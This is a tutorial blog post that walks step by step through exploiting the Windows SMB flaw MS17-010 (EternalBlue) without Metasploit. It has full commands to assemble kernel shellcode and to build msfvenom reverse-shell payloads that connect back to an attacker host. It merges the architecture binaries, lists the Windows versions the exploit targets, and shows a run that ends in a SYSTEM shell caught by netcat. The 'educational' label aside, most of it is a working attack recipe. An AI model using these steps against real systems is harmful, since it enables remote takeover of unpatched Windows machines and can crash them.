For educational purposes only
There may be times when you want to exploit MS17-010 (EternalBlue) without having to rely on using Metasploit. Perhaps you want to run it from a ‘Command & Control’ system without msf installed, run a quick demo or execute on the go. Unlike “zzz_exploit”, this method does not require access to a named pipe, nor does it require any credentials. The downside, however, is an increased risk of crashing the target. Kudos to Worawit Wang for making this easy.
Start by cloning the following repository:
$ git clone https://github.com/worawit/MS17-010.git
The shellcode directory holds (you guessed it) the kernel shellcodes.
$ ls -l MS17-010/shellcode/
total 44
-rw-r--r-- 1 root root 20305 Dec 2 22:03 eternalblue_kshellcode_x64.asm
-rw-r--r-- 1 root root 19862 Dec 2 22:03 eternalblue_kshellcode_x86.asm
-rw-r--r-- 1 root root 1589 Dec 2 22:03 eternalblue_sc_merge.py
The first step is to assemble shellcode to binary. You can do either one (depending which architecture your target is running), or assemble both and merge them to a single binary file. The latter is useful when you don’t know the target arch or if you are planning to run it against multiple systems with different architectures.
x64 shellcode
Assemble kernel shellcode with nasm:
$ nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin
Generate a binary payload or use an existing one. Name this sc_x64_payload.bin:
$ msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=192.168.0.29 --platform windows -a x64 --format raw -o sc_x64_payload.bin
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Saved as: sc_x64_payload.bin
Concentrate payload & shellcode:
$ cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin
x86 shellcode
Assemble kernel shellcode with nasm:
$ nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin
Generate a binary payload or use an existing one. Name this sc_x86_payload.bin:
$ msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=192.168.0.29 --platform windows -a x86 --format raw -o sc_x86_payload.bin
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Saved as: sc_x86_payload.bin
Concentrate payload & shellcode:
$ cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin
Merging binaries
This step is only necessary when you want both x64 and x86 in the same binary. Assuming that you followed the steps above for each architecture; merging is done with the included eternalblue_sc_merge.py script:
$ python MS17-010/shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
Targets
The eternalblue scripts are located in MS17-010/ and have the following targets.
eternalblue_exploit7.py:
- Windows Server 2008 & R2
- Windows Server 2012 & R2 (x86)
- Windows Server 2016 (x64)
- Windows Vista
- Windows 7
eternalblue_exploit8.py:
- Windows Server 2012 (x64)
- Windows 8.1 & RT
- Windows 10 (x64) (build < 14393)
Running exploit
Word of advice; running these blindly against the target is a bad idea. Be sure to enumerate the OS first. Also, expect your target to crash or force a reboot once the session is closed.
Example running against vulnerable Windows 7 host:
$ python MS17-010/eternalblue_exploit7.py 192.168.0.31 sc_all.bin
$ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.0.29] from (UNKNOWN) [192.168.0.31] 49191
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system